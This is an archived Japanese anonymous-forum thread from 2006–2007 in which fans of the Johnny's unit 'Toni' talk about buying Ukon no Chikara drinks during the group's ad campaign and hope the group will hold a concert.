何故売上が上がったのか、エロい人に分かってもらうには
はっきりさせるのもいい方法だと思うけど。
そんな自分も買い控え組。

153 :ななしじゃにー:2006/12/25(月) 07:51:19 ID:AFVGywhg
>148はちょっと…だけど、
自担がCMやってる最中に集中的に買うのって、
ジャニヲタ的に普通だと思ってたw

154 :ななしじゃにー:2006/12/26(火) 11:04:42 ID:LT3COTGY
ジャニじゃなくても普通だと思ってたww

よっぽどイイ(゚∀゚)!!って思わない限り、CMキャラが変わったら買い控える
ウコンは続けると胃にきたから二日に一本で飲み続けてたから、変更になって助かったような寂しいような…

155 :ななしじゃにー:2006/12/26(火) 19:33:31 ID:xxOszVcO
茶×3はてっきり年内終了だと思っていた
続行するのか


156 :ななしじゃにー:2006/12/26(火) 20:47:32 ID:dyGjNHGf
もちろんCM中は集中的に買いまくるけど
終わってからも愛着が出ちゃってなかなか離れられない自分。
エロい人に分かってもらうには
スッパリやめるべきなのかもしれないが。

157 :ななしじゃにー:2006/12/26(火) 21:03:35 ID:FrqHNNNR
戸煮CM中も一度も買った事ない自分

158 :ななしじゃにー:2006/12/28(木) 03:11:49 ID:21Q403i1
CM中は率先して購入する

買い控えないけど、よっぽどイイ(゚∀゚)!!じゃないと
自然と買わなくなっちゃうんだな


159 :ななしじゃにー:2006/12/28(木) 20:18:46 ID:1yRX1682
戸煮担が火をつけたのに勘違いされちまったかな。
コンビニはレジで年齢層と男女を登録するからね。
急激に女買いが増えたはず。

160 :ななしじゃにー:2006/12/28(木) 22:01:06 ID:7+NKL/X3
でも戸煮がCMする前から評判は良かったよ。
結構幅広い年齢層が買って行ってたもん。

161 :ななしじゃにー:2006/12/30(土) 13:05:48 ID:4VLL2T/l
最近6本セットで売ってるんだな
戸煮CM中なら間違いなくまとめ買いするとこ

162 :ななしじゃにー:2006/12/30(土) 13:42:52 ID:Rce31Omk
自分は年末年始に向けて、
6本セットを2パック買って来たとこ。
多分これからも買い続けるよ。

163 :ななしじゃにー:2006/12/30(土) 19:12:02 ID:gefNszqO
これなんてウコンスレw

164 :ななしじゃにー:2006/12/31(日) 22:31:18 ID:sPYTixUj
TVCMだけじゃなくて、ポスターだのポップだの
金かけた宣伝だっただけの売上うpなら
次はまた何かで遣って貰えるさ、きっと。

165 :omikuji! 【1744円】 !:2007/01/01(月) 16:09:21 ID:3TwLl3De
あけおめ!
今年こそ戸煮紺が開催されますように…
大吉だったら戸煮紺大ケテーイ!!

166 : 【大吉】 !:2007/01/01(月) 16:30:46 ID:3TwLl3De
orz…リベンジ!

167 : 【大吉】 【1293円】 :2007/01/01(月) 18:22:09 ID:IYZKx7yc
自分も。
大吉だったら戸煮紺!戸煮紺!

168 : 【大吉】 【1977円】 :2007/01/01(月) 21:41:07 ID:pjBefc9R
大吉なら

169 : 【だん吉】 【1025円】 :2007/01/01(月) 23:09:58 ID:UiBV8xsH
戸似紺来い

170 :ななしじゃにー:2007/01/02(火) 01:43:26 ID:mIYSFmwX
牛紺、中継終わった後だけど
記念撮影終えてムービングステに乗ってメインに戻る時
戸煮は3人で手を繋いで上げててちょっとジーンときた
そろそろ戸煮紺が見たいんですけど

171 :omikuji!:2007/01/02(火) 16:20:01 ID:ZoQLUKs0
戸煮コン今年はありますように(-人-)ナモナモ

172 :ななしじゃにー:2007/01/02(火) 22:42:45 ID:U80huRc0
新曲の「笑って〜」で、叫び紺の俺様ソロを思い出し、
余計に戸煮紺行きたくなった。

どうか今年はありますように
 ノシ賽銭 (-人-)ナムナム

173 :ななしじゃにー:2007/01/03(水) 19:05:01 ID:PwkJQW1+
('A`)

174 :ななしじゃにー:2007/01/03(水) 19:31:59 ID:LFT5ShnQ
↓メル欄

175 :ななしじゃにー:2007/01/03(水) 23:30:14 ID:apxOoCAk
戸煮紺って担からも事務所に要望出すべきなのかな?
…とは言え要望の出し方もわからないorz

今は常に何処かのGが紺やってる状態だから
戸煮に会場回したり戸煮まで運営する余裕ないのかな。
話題性は少ないかもだけど金なら落とすのに(´・ω・`)

176 :ななしじゃにー:2007/01/03(水) 23:50:42 ID:lJN3wE/1
>175
髪の場合は麺髪紺がやりたがっても
上(事務所側)からのOKが出ないって☆がラジオで言ってた。
戸煮もよっぽど強く要望出さないと難しいのかな。
武威紺だってスチだけど戸煮紺に行きたいよママン…

177 :ななしじゃにー:2007/01/05(金) 00:24:17 ID:iPPnTKFv
どうして上はOK出さないんだろう。
面倒なのか?儲からないのか?

178 :ななしじゃにー:2007/01/05(金) 00:42:09 ID:RlBhVso/
$誌にも出なくなって久しいし、そう言う事なんだろう。
茶×3だって1人枠に戸似として突っ込んだ感じもしなくはないし。
老け線か誰かが戸似はやりたがってるが、
事務所がスケ調整してくれないってのもあったよね。
戸似自身はやる気あるみたいだし、希望はあるけどさ。

179 :ななしじゃにー:2007/01/05(金) 00:43:43 ID:ymYk3HyP
武威紺に大きなお金掛けてるからなぁ。

公民館とか、近くの小学校の体育館でも良いのに。

180 :ななしじゃにー:2007/01/05(金) 01:26:53 ID:c68Xhv3A
小さい会場でいいとヲタは思ってるんだがなぁ。
贅沢は望まないから戸煮紺やってよぅ

181 :ななしじゃにー:2007/01/05(金) 02:04:57 ID:xDigJcL7
セットもそんなに凝らなくていいから。

182 :ななしじゃにー:2007/01/05(金) 10:14:37 ID:rj6PcVFl
四畳半でもいいから。
ライトはヲタが懐中電灯当てるから。

183 :ななしじゃにー:2007/01/05(金) 14:09:15 ID:Sfj/47H/
デパートの屋上やレコード屋店頭、
公営ギャンブル場でのミニライブでもいい
細々と全国を回ってくれ

184 :ななしじゃにー:2007/01/05(金) 14:12:06 ID:zl0ZH6Y+
>182はチケ入手困難棚

2a前で踊る何様を想像してみる

185 :ななしじゃにー:2007/01/05(金) 15:22:40 ID:T53iioFX
>183
それはあまりにも戸弐がカワイソスww
芸人の余興じゃないんだからw

186 :ななしじゃにー:2007/01/05(金) 18:14:50 ID:irtG510q
若い衆がソロ紺やった中
戸煮紺で固め売りってのもな…


187 :ななしじゃにー:2007/01/05(金) 22:43:00 ID:nomR+G5h
事務所は戸煮担姉さんの戸煮紺用貯金が幾ら溜まってるか解ってないんだな。
今だったら冗談抜きで全ステ出来るんだけどなぁ。
やっぱり脳内紺するしか無いのかな…

188 :ななしじゃにー:2007/01/06(土) 00:15:02 ID:knS1wF9l
戸煮紺の為に押さえてある会館は無いよ
以前の様に客は集まらなし会員数減ってる

189 :ななしじゃにー:2007/01/06(土) 00:51:33 ID:E++x4ZDq
( ゚д゚)ポカーン

190 :ななしじゃにー:2007/01/06(土) 15:28:03 ID:jGDZoskV
残念ながら戸煮紺は別腹。
それぞれの担はもちろんだが、他のGも結構いるのは、
前回のツアーの打ち上げ領収書をかけた戦いで立証済み。



191 :ななしじゃにー:2007/01/06(土) 17:53:19 ID:XfgZENSd
姐さん、今日は次世代で蜂拍子ですよ。
多分俺様あたりがまたミリオンのむこ(ry

192 :ななしじゃにー:2007/01/07(日) 00:03:39 ID:wQ5sdW4a
しまったー!
今日って土曜日だった…今年一発目の次世代聞き逃したorz

193 :ななしじゃにー:2007/01/07(日) 00:05:38 ID:NLzcjkmW
戸煮紺行きたいから武威紺減らして待ってるのに

194 :ななしじゃにー:2007/01/07(日) 22:29:41 ID:EyCsJufh
戸煮紺やるなら
今月あたりに招集礼状来ないとな…

195 :ななしじゃにー:2007/01/08(月) 23:44:59 ID:ORSQ4IqI
戸煮紺貯金使っちゃったので個人的には待ってホスイw

ウソです。ヤッテクダサイオネガイシマス
もし>194通りに今月赤紙が来たら鬼の様に残業しますorz

196 :ななしじゃにー:2007/01/10(水) 12:22:08 ID:YF5oEvSg
朝のズーミンで、西宮神社の福男に2年連続で選ばれた青年が、
「去年は福男になってなにかいいことありましたか?」とインタビューされ、
「お酒を沢山飲んだおかげで肝臓が強くなりました」
さらに付け加えるようにポロッと
「あとウコンの力のお陰も」と言ってましたよ。
去年の今頃だと戸煮宣伝祭りですな。懐カシス。

197 :ななしじゃにー:2007/01/10(水) 23:16:48 ID:TBx/lD6D
バーゲンシーズンに
戸煮からお呼び出しは…
ちょっと!ちょっと!ちょっと!

198 :ななしじゃにー:2007/01/14(日) 09:37:35 ID:1VTXzwxw
(^-^)/ ttp://sakaiyakoubou.blog72.fc2.com/

199 :ななしじゃにー:2007/01/16(火) 22:27:12 ID:wOBFXEnI
戸煮とキーを打ったつもりで変換したら「恥部」となってビックリした。
Tだけ間違えずにタッチして、残り「ONI」が左に一つずつずれてて
T「IBU」になったようだ。
全然本人達と関係ない話でスマソが、ちょっと自分的には楽しかったので報告。


200 :ななしじゃにー:2007/01/17(水) 10:31:26 ID:px6f/yKH
(●●)

35 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)